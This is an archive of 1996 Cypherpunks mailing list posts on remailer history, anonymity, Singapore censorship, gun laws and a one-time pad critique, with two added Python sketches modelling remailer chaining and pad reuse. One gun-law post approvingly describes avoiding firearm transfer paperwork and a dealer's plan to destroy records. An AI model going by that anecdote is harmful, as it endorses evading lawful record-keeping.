>security against traffic analysis by eavesdroppers, rather than to
>prevent the recipient from knowing the sender's address, though
>everybody pretty quickly realized that the latter was an interesting
>feature, especially coupled with posting to Usenet.

No, the focus was at _least_ as much on providing anonymity as on protection from eavesdroppers or traffic analysts. More so, actually.

How do I know this? Well, I was the one who did the presentation on Chaumian mixes at the first meeting, describing them as remailers and using paper envelopes-within-envelopes to illustrate the concept. Later that day, in the "Crypto Anarchy Game" we played to educate the attendees, remailers were used to post anonymous offers of goods and services, to make contact in message pools, and to generally implement a crypto-anarchic, distributed system. (With some obvious flaws, stalls, and other weirdnesses.) Still, it embodied most of what we see today (and a lot more that we still haven't managed to implement).

The next afternoon, Hugh Daniel, Eric Hughes, and I went out for some bagels and talked about what had been learned. Either Hugh or Eric had the idea of coding up the remailer in C or Perl. As it turned out, Eric was the one to do it, a few weekends later, using Perl (which he learned enough of on Saturday to then do on Sunday).

The first remailer was put for use and immediately began to be used for anonymous postings. And all of the early uses were explicitly to anonymize the sender, not to deter eavesdropping (which conventional crypto works well for, anyway).

The Kleinpaste-style remailer was in a nascent stage, and Julf was running one on his site.
But we all knew the longterm advantages of chained remailers, and, of course, even the very first Hughes remailer supported arbitrary chaining. And we also knew of the central defect of the Kleinpaste-style anonymizer, that law enforcement would seek the records through subpoena. As it turned out, penet lasted longer than I for one thought it would.

PGP encryption was added soon after to the Hughes-style remailer, by Hal Finney, as I recall. Later developments, by Matt Ghio, Lance Cottrell, etc., added to the capabilities.

So, the anonymizing and arbitrary chaining (which is for protection against collusion of the remailers and subpoenas of logs) features were there from the start. Even before the start, as the "Crypto Anarchy Game" had them.

(I've been clear that it was Eric Hughes who coded the first Perl version, but I feel I have to make my own role clear. There are some critics of me here on this list who have claimed "Tim has never done a thing for Cypherpunks except talk." Well, besides organizing the first meeting with Eric, and giving the morning talk on the topics mentioned, and demonstrating the role of mixes and digital cash, and writing articles on many topics, and setting up BlackNet (which actually works, and is not just an idea), and on and on, I'm satisfied with my contributions. Your mileage may vary.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

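
The envelopes-within-envelopes chaining described in the message above, sketched as an added example; it is not Eric Hughes's Perl remailer or any code from the list. The remailer names, the log format and the HMAC-based toy cipher standing in for PGP encryption are assumptions made for illustration.

```python
import hashlib
import hmac
import json
import os

def _subkey(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()

def _keystream(key, nonce, length):
    blocks = [hmac.new(key, nonce + i.to_bytes(8, "big"), hashlib.sha256).digest()
              for i in range((length + 31) // 32)]
    return b"".join(blocks)[:length]

def seal(key, plaintext):
    """Toy encrypt-then-MAC, standing in for PGP encryption to one remailer."""
    nonce = os.urandom(16)
    stream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    body = bytes(p ^ s for p, s in zip(plaintext, stream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + body, hashlib.sha256).digest()
    return nonce + tag + body

def unseal(key, blob):
    nonce, tag, body = blob[:16], blob[16:48], blob[48:]
    good = hmac.new(_subkey(key, b"mac"), nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, good):
        raise ValueError("envelope was not sealed for this remailer")
    stream = _keystream(_subkey(key, b"enc"), nonce, len(body))
    return bytes(c ^ s for c, s in zip(body, stream))

def digest(packet):
    """Short message ID of the kind a remailer log might record (assumed)."""
    return hashlib.sha256(packet).hexdigest()[:16]

def wrap(chain, recipient, message, keys):
    """Build the nested envelope from the inside out: last hop first."""
    packet, next_hop = message, recipient
    for name in reversed(chain):
        layer = json.dumps({"next": next_hop, "body": packet.hex()}).encode()
        packet, next_hop = seal(keys[name], layer), name
    return packet  # hand this to chain[0]

class Remailer:
    def __init__(self, name, key):
        self.name, self.key, self.log = name, key, []

    def process(self, came_from, packet):
        """Open one envelope; learn only the previous and the next hop."""
        layer = json.loads(unseal(self.key, packet))
        inner = bytes.fromhex(layer["body"])
        self.log.append({"from": came_from, "in": digest(packet),
                         "to": layer["next"], "out": digest(inner)})
        return layer["next"], inner

def deliver(sender, first_hop, packet, remailers):
    came_from, hop = sender, first_hop
    while hop in remailers:
        next_hop, packet = remailers[hop].process(came_from, packet)
        came_from, hop = hop, next_hop
    return hop, packet  # (final recipient, plaintext)

def trace(first_hop, packet, seized_logs):
    """Follow one observed packet using only the logs that were seized.

    Returns the last address the investigator can name: the recipient if
    every hop's log is available, otherwise the hop where the trail stops.
    """
    hop, wanted = first_hop, digest(packet)
    while hop in seized_logs:
        entry = next((e for e in seized_logs[hop] if e["in"] == wanted), None)
        if entry is None:
            break
        hop, wanted = entry["to"], entry["out"]
    return hop

def demo():
    names = ["remailer-a", "remailer-b", "remailer-c"]  # constructed names
    keys = {n: os.urandom(32) for n in names}
    remailers = {n: Remailer(n, keys[n]) for n in names}
    p1 = wrap(names, "bob", b"offer: one bagel", keys)   # constructed traffic
    p2 = wrap(names, "dave", b"meet at the pool", keys)
    delivered = [deliver("alice", names[0], p1, remailers),
                 deliver("carol", names[0], p2, remailers)]
    logs = {n: r.log for n, r in remailers.items()}
    return {
        "delivered": delivered,
        "exit_log_sources": sorted({e["from"] for e in logs["remailer-c"]}),
        "all_logs_seized": trace(names[0], p1, logs),
        "first_and_last_seized": trace(
            names[0], p1, {n: logs[n] for n in ("remailer-a", "remailer-c")}),
        "no_logs_seized": trace(names[0], p1, {}),
    }

if __name__ == "__main__":
    for label, value in demo().items():
        print(label, "->", value)
```

The sketch models seized logs only; correlation by timing or message size, which fixed-size packets and reordering in later remailers address, is outside its scope.
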
From qut at netcom.com Mon Sep 2 13:23:58 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 04:23:58 +0800
Subject: Sharp Knives
In-Reply-To: <199609021720.MAA06616@manifold.algebra.com>
Message-ID: <199609021809.LAA01872@netcom21.netcom.com>

! How do these Ninja stars work anyway?
!
! I've heard about them, but do not know much.

I don't know either, they're as illegal to own as it is to rip off a car!

From markm at voicenet.com Mon Sep 2 13:28:55 1996
From: markm at voicenet.com (Mark M.)
Date: Tue, 3 Sep 1996 04:28:55 +0800
Subject: Cypherpunk Mailboxes?
In-Reply-To: <199609021534.KAA26279@mailhub.amaranth.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, William H. Geiger III wrote:

> Hi,
>
> I have a thought for addressing the anon. problem.
>
> We could create a network of anonymous remailers with mailboxes. All
> messages in the mailboxes are stored encrypted. No information about the
> users are kept. Users would be given x K of mailbox space.
>
> We could use PGP keys for encrypting the messages. Each user would have his
> own key pair for his anonymous mailbox. Any plain text messages received to
> the server would be encrypted on receipt.
>
> Let the government's subpoena away. :)
>
> "Sorry we don't have user addresses, no I can't decrypt those messages
> Senator."
>
> What do you think?

The only problem is there has to be some way for users to retrieve their mail. The current nym server approach is to use an encrypted reply block to send a user new mail. This way the nym server doesn't know who the user is. If users have to actively retrieve their mail, then the feds could install a packet sniffer on the remailer's net link to find out the real email address of an anonymous user.

- -- Mark

PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

-----END PGP SIGNATURE-----

From amehta at giasdl01.vsnl.net.in Mon Sep 2 13:41:35 1996
From: amehta at giasdl01.vsnl.net.in (Arun Mehta)
Date: Tue, 3 Sep 1996 04:41:35 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <1.5.4.32.19960902174515.0032f9cc@giasdl01.vsnl.net.in>

At 19:13 02/09/96 +1000, James Seng wrote:
>
> What i am saying is that Asian (Singapore)
>values are _DIFFERENT_ from western (America) values. [i know i am generalising]
>
>When you look at the laws and regulation. You cannot just look at what you
>think is best. You have to look at other things. Culture, social and
>economical structure, religion and history. In every aspect, Singapore (or
>most Asian for that matter) are different. Thus, you cannot judge a
>Singapore government action based on your social background.

I've been reading some of the postings on singapura.singnet.com.sg: quite a few people in Singapore are pissed off that they have to go through the proxy. So, not everyone in Singapore thinks as differently from those of us who oppose your government's action as you would have us imagine.

Look, if the government had said, "those who wish to avoid smut on the Net, go through this proxy, but those who do not wish our guidance can do as they please," we would not be having this discussion. What we have a problem with is the government trying to *force* on everyone its own judgement on what is appropriate.
People like you in Singapore are responsible, thinking adults. Surely you can make the choice yourself on whether you wish to accept government guidance in this or not?

>
>Sad to say, Singapore government does have a lot of power. But i am glad
>what you mention isn't happening in Singapore. I haven't heard of any serious
>corruption cases or people accepting bribes etc. Nor does the people here
>feel a suppressed nor are there general dissatisfaction. I think you are too
>influenced with the perspective from 1984. *8)

In 1975, Indira Gandhi imposed a totalitarian regime in India. The newspapers only carried news about how happy everyone was with the controls. Lulled into complacency, Mrs. Gandhi called elections, partly to make everyone shut up. What happened? She was soundly defeated. Moynihan, a former US ambassador to India, remarked, "Politicians rarely like what they read about themselves in a free press, but it can save their skin." Or words to that effect.

Maybe, just maybe, there is far more corruption in Singapore than you think, but that you have no way of finding out without a free press?

Arun Mehta Phone +91-11-6841172, 6849103 amehta at cpsr.org
http://www.cerfnet.com/~amehta/ finger amehta at cerfnet.com for public key

From ponder at freenet.tlh.fl.us Mon Sep 2 13:53:50 1996
From: ponder at freenet.tlh.fl.us (P. J. Ponder)
Date: Tue, 3 Sep 1996 04:53:50 +0800
Subject: new-thinking mailing list tidbit; Singapore slings
Message-ID:

keywords: thought police; mind control; Stone Age; cluelessness; Island nation; why are remailers bad?

the mailing list 'new-thinking' has an interesting piece in the current issue, speaking of on-line communities of interest.
the archive is at:

********************************************************************
For a hyperlinked version of this piece, please go to:
http://www.nua.ie/NewThinking/Archives/newthinking011/index.html
For New thinking archives, please go to:
http://www.nua.ie/NewThinking/Archives/index.html
********************************************************************

+++++

sounds like the Singapore brainwashing is working pretty well if their educated people are opposed to even a discussion of whether free speech is a good thing or not. Yikes. It isn't a cultural thing, pinhead. Get life, government goon. Free speech is the right to say things others - even a _majority_ or even the government - may find unpopular. And you can tell your fascist dictator I said so.

--
P.J. Ponder

OBCrypto: for a keyed-SHA signature system, is there an advantage to pre-pending the keystring as opposed to appending it? I think I read something about this in one of Hugo Kracyk's (sp) papers about a keyed-MD5 system, but now I can't find it. If I recall correctly, he explained why it was better to put the key part in the beginning, instead of the end.... Thanks for any help.

[Anti-Dyson and anti-EFF rant left off for now. waiting for more responses from EFF et al. Was nice to get a reply from Esther Dyson. Didn't change my mind about anonymity being a good thing, though. It will be interesting to see what Julf gets back from his survey of why people are opposed or in favor of anonymity.] [See the web page listed in the press release from penet.]

I looked at the FTP, Inc. software site referenced here a few days ago for the email package that integrates PGP. Pretty hefty package to ftp over a 28.8 dialup. The write-up on the web page looked good - I'll ftp it at the office over the T1 if I can and see what it does. I assume it blows up after the 30 days (or whatever the trial period is)?

From amehta at giasdl01.vsnl.net.in Mon Sep 2 14:00:15 1996
From: amehta at giasdl01.vsnl.net.in (Arun Mehta)
Date: Tue, 3 Sep 1996 05:00:15 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <1.5.4.32.19960902174507.0032cf14@giasdl01.vsnl.net.in>

At 15:18 01/09/96 -0700, Rishab Aiyer Ghosh wrote:
>Arun Mehta wrote:
>> and India will be too: the law here holds the ISPs responsible
>> for ensuring that nothing objectionable and obscene is carried by
>> them, and what simpler way to comply than to
>
>FWIW: "There is no need to licence content providers; Internet
>service providers are not responsible for illegal content." R K
>Takkar, Indian Telecom Secretary (at the time of interview)

What Mr. Takkar says isn't law, plus he's gone. The law clearly holds ISPs responsible for content: when it suits the government it will pull it out. Doesn't even have to be the government: some headline-seeking opposition politician could take the government to task because the government-run ISPs aren't complying with the law. And please don't get lulled into complacency by a stupid law that isn't being enforced: in 1975, Indira Gandhi pulled out a host of them to *legally* impose dictatorship.

>> Ideally, I should be able to
>> send via pgp and anonymous remailer a request for a page, which would soon
>> come beamed down unencrypted via satellite. No more waiting hours
>> for the latest version of Netscape to download
>
>(!) you'll only have to wait hours for your anonymous-remailer-web-to-e-mail
>gateway, EVERY time you want a page.

every time I want a BANNED page -- I'd say it's worth it. In the process of accessing it, I also show it to everyone in Asia, thus giving the banned stuff much more publicity than it otherwise would get on the net.

>governments will
>eventually see sense and stop censorship, if they're interested in
>making their countries rich.
>Singapore in every other field of work
>has shown its interest in deregulation; I would expect them to do so
>on the Net as well, when it becomes clear that there's rather more to
>it than porn and subversion.

Governments everywhere (see Declan's long list) seem to think they can separate out the porn and subversion from the "rather more". Just as in the German case, where the Zundel-site was mirrored so that Germans could access it, external measures to help Singaporeans access what they like would certainly help their government "see sense."

>In the meanwhile, there's not much point
>trying to "help" them, apart from providing moral support.

Guess I'll risk being accused of indulging in cliches when I cite the famous Niemoeller quote once more which begins, " First they came for the communists, and I did not speak out, for I was not one"... and ends "And then they came for me. There was no one left to say anything..."

Freedom is won and lost in inches, and you have to fight every single inch they try to take away.

Arun Mehta Phone +91-11-6841172, 6849103 amehta at cpsr.org
http://www.cerfnet.com/~amehta/ finger amehta at cerfnet.com for public key

From qut at netcom.com Mon Sep 2 14:05:40 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 05:05:40 +0800
Subject: Silenced Machine Guns Are Safer Than TWA
Message-ID: <199609021837.LAA05216@netcom21.netcom.com>

tcmay at got.net (Skippy) wrote:

! At 4:33 AM 9/2/96, qut at netcom.com (Net God) wrote:
!
! >Contrary to popular fiction, ALL firearms have been permanently
! >registered since the 1968 Gun Control Act. The media monopoly lies when
! >they say the contrary.
!
! Nope. Gun sales between individuals without any paperwork were fully legal
! in some places until recently (and may still be fully legal...I can only
! speak of California).

So? I was talking about NEW sales of firearms from license holders. Let's consider improving the future rather than preserving the past, shall we?

! >From 1974 until a couple of years ago, I bought and sold a dozen or more
! rifles, handguns, and even Evil Assault Weapons, mostly through fully legal
! gun shows. I even sold a .357 Smith to some guy, made a joke about how
! great these gun shows were and how great it was to be able to just take
! cash and hand over a gun without any paperwork...the guy laughed and said
! he was a San Jose cop. I felt nervous for a few seconds, but quickly
! realized there was no law *I* was breaking, so I laughed too.
!
! Most of these guns I kept no records on, nor did any laws say I had to.
!
! (A few years ago it became necessary for even private citizen-units to
! obtain the proper firearms transfer papers from the gubment. I wanted to
! sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail
! (as I'd not had one when I acquired the piece a few years earlier), so a
! friend of mine used his friendly neighborhood libertarian FFL dealer, who
! has a policy that the stack of transfer forms he is required to keep on
! file will mysteriously burn up if the Feds ever seek out his records. (Who
! knows if he'll abide by this policy, but the point is that there are
! literally tens of thousands of these "kitchen table FFL dealers," and no
! computerized filing of records. This is one reason I quit the NRA: they are
! advocating the "instant check." Such an instant check would mean massive
! computerization of all files, and of course cross-referencing to files on
! citizens. This would be much worse than the "paper chaos" of stacks of
! firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day
! ineffectual waiting period to a Big Brother database of all purchasers.)

So you'd prefer the security of obscurity? I'd prefer to have much more government protected rights, openly. Do you believe the civil courts have a role in protecting people's rights? If so, then "government protected rights."

! >BTW, I muse that the issue of guns, drugs and censorship make an
! >excellent litmus test for libertarians: either you support the
! >legalization of, all of, or you're a fake.
!
! I'm not sure what the "legalization of censorship" would mean, though I
! support the right of anyone to screen out what they choose not to read or
! view. And I support the right of companies to decide what materials to buy,
! have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a
! tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.")
!
! I fully support legalization of all drugs, all guns, and am unalterably
! opposed to any form of government censorship.

I meant the good side of the censorship issue! But I also support enforcement of the anti-trust laws, so some would view the court enforced break up of illegal collusion of the media to crush competition as "government censorship."

From qut at netcom.com Mon Sep 2 14:27:35 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 05:27:35 +0800
Subject: Sharp Knives
In-Reply-To:
Message-ID: <199609021911.MAA08644@netcom21.netcom.com>

! At 1:38 PM 9/2/96, Dave Harman OBC wrote:
!
! >In California, it's a felony to merely *own* a Ninja star. It's a
! >felony to carry a *concealed* knife, but carrying it openly in a
! >holster is legal. It's a felony for most people to carry a
! >concealed loaded handgun on the street only on a *second* offense.
! >It's a felony to merely *own* a switchblade, brass knuckles, etc.
! >Do our weapons laws sound strange? Are many of our weapons laws
! >stricter than countries like Sweden? Yes!
!
! Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were
! devised to control the coloreds, who could not afford the weapons of choice
! of whites and other gentlemen.
!
! Hence, a colored who gets picked up on some charge, or detained, can be
! jailed on a felony charge for having a pocketknife, or a sap, or brass
! knucks. Coloreds from Asia can be jailed for having the martial arts sorts
! of weapons.
!
! A white gets a misdemeanor charge for carrying a gun.

Of course, whites never commit other crimes, are never on the proscribed categories, and people of colour never carry guns or are never free of being classified as being in the proscribed categories. You sound like Skippy making fun of the McClatchy newspapers.

! (This analysis is not original with me. The gun magazines have noted the
! racist origins of misdemeanor/felony dichotomies for many years. One
! article I read a few years ago traced the precise times at which these laws
! came into being...mostly the times in various states corresponded with
! periods of high immigration of coloreds to major cities.)
!
! Here in California there's a bill pending in the legislature which would
! decriminalize the carrying of a pocketknife that can be opened with one
! hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with
! thumb holes or studs). Even though such knives are openly sold in every
! sporting goods store I have ever been in, and are carried by a truly large
! fraction of the population, such knives are currently classified as
! "switchblades" and can be prosecuted as a felony. A good way to selectively

What? Are you talking about lockbacks? An actual switchblade is a felony to *possess* in California.

! harass someone. Interestingly, it was the District Attorneys lobbying

I'm familiar with the anti-racist pandering of the gun rights majority. The weapons mentioned above were banned later this century in California, ostensibly to protect minors. There has always been cheap firearms available to poor people in America, I'm not aware that only coloured people can be poor! It's been a step by step process to take away rights, it's been entirely irrelevant what the laws were supposedly for.
It is not believable that all whites are rich or that poor whites in prison are treated with greater respect than rich people of colour or poor people of colour. There's been *both* racist and anti-racist elements to the progress of unjust laws, the original intent of the law itself is forgotten if the current law only respects people of capital.

From nobody at replay.com Mon Sep 2 14:39:03 1996
From: nobody at replay.com (Anonymous)
Date: Tue, 3 Sep 1996 05:39:03 +0800
Subject: Too few nymservers
Message-ID: <199609021918.VAA21564@basement.replay.com>

On Sun 1 Sep 1996 Dave Harman OBC wrote :

[snip]
> There has to be more crypto anonymizing aliasing remailers and with
> easier interfaces. Closing the Kleinpaste derived server will help
> put the pressure of demand to start better remailer systems.
> There's not enough capacity and reliability with the servers extant.
> There should be thousands of full featured remailers.

Exactly. Sometimes *all* the nymservers are down at the same time.

From cmcurtin at research.megasoft.com Mon Sep 2 14:53:48 1996
From: cmcurtin at research.megasoft.com (C Matthew Curtin)
Date: Tue, 3 Sep 1996 05:53:48 +0800
Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.)
In-Reply-To: <01bb94a6.44902540$8adc9dcc@survival>
Message-ID: <864tlgivwo.fsf@goffette.research.megasoft.com>

The following message is a courtesy copy of an article that has been posted as well.

-----BEGIN PGP SIGNED MESSAGE-----

"Alex Walker" writes:
> The strongest encryption system available to the public will be available
> soon at:
> http://www.aa.net/cyber-survival-hq
>
> ALPHACIPHER has been in the making for the past ten years, and has come
> into its own
> with the proliferation of Internet communications.
>
> A demo of this program along with a FAQ can be downloaded from
> cyber-survival-hq 1SEP. This is an unbreakable program...

Here we go again.

I just got done surfing the site above.
Assuming that all statements regarding the unbreakability of the cipher, the lack of applicability of the question regarding its key size, etc., are at least based on some degree of truth, "alphacipher" is a one-time pad. Given that anything else is not really "unbreakable," if it's not a one-time pad, the claims about its security are bogus.

But let's assume that it is. In exchange for the great security of one-time pads, users of such must be willing to tolerate their drawbacks, and there are some significant ones.

1 The unbreakability of the one-time pad is completely thrown out the window if the key is not _truly_ random. A software based pseudorandom number generator simply won't cut it; even the best PRNGs will have some degree of predictability. It is possible that these random keys are truly random (given point 2, below), but I find this to be unlikely, since the overview boasts that the keys are generated by a "proprietary random key set generator." Now, we're getting into *another* issue, and that is of the wisdom (or, more correctly, lack thereof) in using proprietary algorithms. Not only does this fail to ensure any higher level of security when compared to that of a well-known algorithm, but actually increases the likelihood that an error has gone undiscovered, since fewer experts have had the opportunity to scrutinize it.

2 The pool (or "pad") of random bits from which the keys are generated must be distributed ahead of time. Given this requirement, the "random bit pad" must be distributed with the program itself. In fact, the two "comm key disks" seem to be just this. A third "vault key" disk, used for local online storage, seems to be another random bit pad.

3 Keys must stay perfectly in sync. A single bit-shift either way, and you're hosed.
Given that there is a finite number of bits in the pad (as there must be, since they need to be precalculated and distributed with the program), that they all must stay perfectly in sync, and that the program appears to be marketed for widespread (albeit low-bandwidth) use, there must be some mechanism by which the encrypting program can tell the decrypting program how far along in the bit pad to advance before using them for the key. Otherwise, if I send a message to Alice, then I send one to Bob, Bob is going to use a different starting point in the pad for the key assembly than I did to create the message, unless he also received a copy of what I sent Alice, and every person before that. Giving an indication of the byte offset to use for decryption seems the only workable solution to this problem.

4 The keysize must be exactly equal to the size of the plaintext to be encrypted.

5 Bits from the pad that are used for key generation must never be used again. Ever. Since there are only two "comm key" disks, which must be the same for every distribution, you can probably get somewhere between two and 10 million "random" bits on the disks, depending on whether you're using compression, and if so, what compression algorithm you're using. Let's assume that you've got 10 million bits on there. Since the encryption of one bit exhausts one bit from the pad, I can exhaust the entire supply by sending someone a 10MB mail message. Or two five MB mail messages, or 10 one MB messages. In any case, it doesn't take long. And as soon as I'm out, if I start over again at the beginning, I'm blowing the security, since I'm reusing keys.

6 Anyone with access to the key pad can decrypt a message sent to anyone else, as long as they know the proper bit offset. Because of what I've described in item 3, it seems likely that I'll know that ahead of time. Hence, the security of the "alphacipher" encrypted messages decreases with each additional user that "alphacipher" gains.
So, it seems to me that I can break *any* message that anyone encrypts with "alphacipher" by getting a copy of the comm key disks, figure out how "alphacipher" calculates where in the pad to begin generating the key, and apply the appropriate key to the encrypted message. Perhaps a bit of additional obfuscation is occurring somewhere in there, but the basic premise is that because of what it's trying to do, this has to be a very poor implementation of a one-time pad, and therefore completely vulnerable to passive attack.

(This is using the "comm key"; the "vault key" has much more potential, since it can be unique for every user, but it can still be exhausted very quickly, and therefore have a successful cryptanalysis made of that data, using other means: a larger amount of data will be necessary to reconstruct the bit pad before any messages can be broken, but once again, after it's constructed, anything encrypted using that bit pad can be broken. And, since it seems unlikely that we're dealing with REAL random numbers here, this probably isn't nearly as tough as it ought to be.)

I have absolutely no knowledge of "alphacipher" beyond what is contained in the original posting I saw on alt.security which pointed me to the web page (http://www.aa.net/cyber-survival-hq/Alpha1.htm) but it seems that I've made a decent (albeit trivial) analysis of its weakness, and at least given serious raise to your ability to make such claims about its security.

If I'm wrong, please show me how so. If not, please do us all a favor and quit with the advertising claims.

(All I need now is someone to threaten to sue me, and I'll maintain my record of having lawsuit threats made against me every time I criticize something that claims to be "strong crypto.")

- --
C Matthew Curtin MEGASOFT, INC Chief Scientist
I speak only for myself. Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/

From jamesd at echeque.com Mon Sep 2 15:30:16 1996
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 3 Sep 1996 06:30:16 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <199609021945.MAA05327@dns2.noc.best.net>

At 07:13 PM 9/2/96 +1000, James Seng wrote:
> What i am saying is that Asian (Singapore)
> values are _DIFFERENT_ from western (America) values.

One of the classic Greek rationalizations for slavery was that Asians are slaves by nature. It would seem that you are saying that they were right.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From unicorn at schloss.li Mon Sep 2 15:47:56 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 3 Sep 1996 06:47:56 +0800
Subject: Sharp knives
In-Reply-To:
Message-ID:

On Mon, 2 Sep 1996, Asgaard wrote:

> "James A. Donald" , writes:
> >I heard on talk.politics.guns somebody say that in Sweden they
> >had banned knives with a sharp point at the end, and were going
> >to ban sharp knives altogether.
I think he was just engaging in
> >hyperbole, that he really meant that gun control in Sweden was
> >unreasonably strict, but on reflection I am not sure.
>
> There is a law in Sweden, some 5 years old, against carrying
> 'dangerous devices' (hunting knives, Ninja stars etc) in 'public
> places' (unless you are a carpenter, electrician or some such
> going about your business). It's okay to carry a knife when
> going fishing/hunting or sitting on your terrace carving totem poles.
> It's only a misdemeanour and might be punished with a fine,
> but usually the cops just use the law to disarmour street gangs
> on the spot. The effects of the law are dubious. Knives have come
> into fashion among teenagers after this legislation (but not as
> a consequence of it, I think).

This mirrors D.C.'s concealed weapon law. A screwdriver is a weapon if you are carrying it for that purpose (i.e. if the cop thinks he wants to arrest you) but a tool if you are carrying it for that purpose (i.e., if you are wearing an expensive suit and look non-ethnic).

>
> Asgaard
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 15:49:22 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 3 Sep 1996 06:49:22 +0800
Subject: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
Message-ID: <01I90CVK55W89JDDSI@mbcl.rutgers.edu>

I would suggest that support for "parental empowerment" and for any sort of mandated rating system (e.g., PICS with a requirement to rate pages for parental censorship use) be a down-rating.

-Allen

From perry at piermont.com Mon Sep 2 15:54:56 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 3 Sep 1996 06:54:56 +0800
Subject: desubscribe
In-Reply-To:
Message-ID: <199609022045.QAA21135@jekyll.piermont.com>

Christopher Carper writes:
> desubscribe

Never.
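
On points 3, 5 and 6 of C Matthew Curtin's ALPHACIPHER analysis earlier in this archive, an added example that is not part of any post here: it models the scheme he infers (one fixed pad shipped to every user, with the key offset sent alongside each message) and shows what wrap-around reuse and a shared pad give away. The class layout, names and sample messages are assumptions constructed for illustration, not ALPHACIPHER's actual format.

```python
import os


class PadExhausted(Exception):
    """Raised instead of silently reusing pad bytes."""


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


class SharedPad:
    """Hypothetical model: a finite pad plus a running offset.

    wrap=True  restarts at the beginning when the pad runs out (point 5).
    wrap=False refuses to encrypt once the pad is used up.
    """

    def __init__(self, pad: bytes, wrap: bool):
        self.pad = pad
        self.wrap = wrap
        self.next_offset = 0

    def key_at(self, offset: int, length: int) -> bytes:
        if offset + length > len(self.pad) and not self.wrap:
            raise PadExhausted(
                f"need {length} bytes at offset {offset}, pad holds {len(self.pad)}"
            )
        return bytes(self.pad[(offset + i) % len(self.pad)] for i in range(length))

    def encrypt(self, plaintext: bytes):
        """Return (offset, ciphertext); the offset travels in the clear (point 3)."""
        offset = self.next_offset
        ciphertext = xor(plaintext, self.key_at(offset, len(plaintext)))
        end = offset + len(plaintext)
        self.next_offset = end % len(self.pad) if self.wrap else end
        return offset, ciphertext

    def decrypt(self, offset: int, ciphertext: bytes) -> bytes:
        return xor(ciphertext, self.key_at(offset, len(ciphertext)))


# Constructed sample data. Both messages are 32 bytes, and the pad is exactly
# one message long so the second message forces a wrap-around.
MSG_TO_ALICE = b"meet at the north gate at nine.."
MSG_TO_CAROL = b"wire the payment to account 4471"
# os.urandom is a CSPRNG standing in for the vendor's pad; the results below
# do not depend on how good the pad bytes are.
PAD = os.urandom(len(MSG_TO_ALICE))


def third_party_reads(pad: bytes) -> bytes:
    """Point 6: any holder of the same pad disk reads anyone's mail."""
    sender = SharedPad(pad, wrap=True)
    offset, ciphertext = sender.encrypt(MSG_TO_ALICE)
    bob = SharedPad(pad, wrap=True)  # Bob was never the intended recipient
    return bob.decrypt(offset, ciphertext)


def reuse_leaks(pad: bytes):
    """Point 5: after wrap-around, two ciphertexts share key bytes.

    The observer here holds no pad at all. XORing the ciphertexts cancels
    the key, so knowing (or guessing) one plaintext yields the other.
    """
    sender = SharedPad(pad, wrap=True)
    off1, c1 = sender.encrypt(MSG_TO_ALICE)
    off2, c2 = sender.encrypt(MSG_TO_CAROL)  # pad is spent, so this wraps
    recovered = xor(xor(c1, c2), MSG_TO_ALICE)
    return off1, off2, recovered


def strict_pad_refuses(pad: bytes) -> bool:
    """A pad that is used correctly stops working when it runs out."""
    sender = SharedPad(pad, wrap=False)
    sender.encrypt(MSG_TO_ALICE)
    try:
        sender.encrypt(MSG_TO_CAROL)
    except PadExhausted:
        return True
    return False


if __name__ == "__main__":
    print("third party reads:", third_party_reads(PAD))
    print("reuse recovers   :", reuse_leaks(PAD)[2])
    print("strict pad stops :", strict_pad_refuses(PAD))
```

The strict mode is the only one that keeps the one-time property, and it makes the capacity limit in point 5 visible: the pad is spent after exactly as many bytes as it contains.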
From gnu at toad.com Mon Sep 2 15:56:10 1996
From: gnu at toad.com (John Gilmore)
Date: Tue, 3 Sep 1996 06:56:10 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <199609022031.NAA28702@toad.com>

> >>Is this _really_ the EFF policy on anonymopus remailers??

EFF does not have an agreed-upon position on anonymity (or anonymopusity). Each of us speaks as individuals on the topic.

